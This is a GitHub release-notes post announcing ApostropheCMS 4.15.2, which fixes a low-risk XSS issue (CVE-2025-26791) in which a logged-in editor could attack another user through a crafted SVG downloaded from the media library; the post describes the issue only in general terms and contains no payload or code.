apostrophe 4.15.2: hotfix for potential low-risk XSS vulnerability #4935
boutell
announced in
Release Notes
Replies: 0 comments
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uh oh!
There was an error while loading. Please reload this page.
-
Version 4.15.2, released today, fixes a potential XSS attack vector, CVE-2025-26791. While the risk was low, it was possible for one user with login and editing privileges to carry out an XSS attack on another by uploading a specially crafted SVG file.
Normally this would not work because ApostropheCMS typically renders uploaded SVGs via an
imgtag, however if the second user downloaded the SVG file from the media library the exploit could work.Beta Was this translation helpful? Give feedback.
All reactions